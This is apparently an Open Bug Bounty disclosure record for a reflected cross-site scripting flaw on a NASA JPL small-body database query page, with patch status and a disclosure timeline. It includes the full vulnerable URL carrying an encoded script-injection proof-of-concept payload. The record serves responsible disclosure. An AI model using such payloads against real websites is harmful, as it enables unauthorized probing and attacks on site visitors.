ssd.jpl.nasa.gov XSS vulnerability

2016-08-06T11:47:00
ID OBB:172354
Type openbugbounty
Reporter ant_cannito
Modified 2016-08-10T11:30:00

Description

Vulnerable URL:
http://ssd.jpl.nasa.gov/sbdb_query.cgi?ast_orbit_class=IMB;ast_orbit_class=MBA;OBJ_field=0;ORB_field=0;table_format=HTML;max_rows=10;format_option=comp;query=Generate%20Table;c_fields=BdBhBgBjBkBlBm;c_sort=;.cgifields=format_option;.cgifields=obj_kind;.cgifields=obj_group;.cgifields=obj_numbered;.cgifields=ast_orbit_class;.cgifields=table_format;.cgifields=com_orbit_class&page;=3%3Cscript%3Econfirm%28%22OpenBugBounty/XSSposed%22%29%3C/script%3E
Details:

Description| Value
---|---
Patched:| Yes, at 09.08.2016
Latest check for patch:| 09.08.2016 18:15 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check ssd.jpl.nasa.gov SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 August, 2016 11:47 GMT
Generic security notifications sent to website owner| 6 August, 2016 11:49 GMT
Vulnerability details disclosed by researcher| 6 August, 2016 12:00 GMT
Vulnerability patched by the website owner| 10 August, 2016 11:30 GMT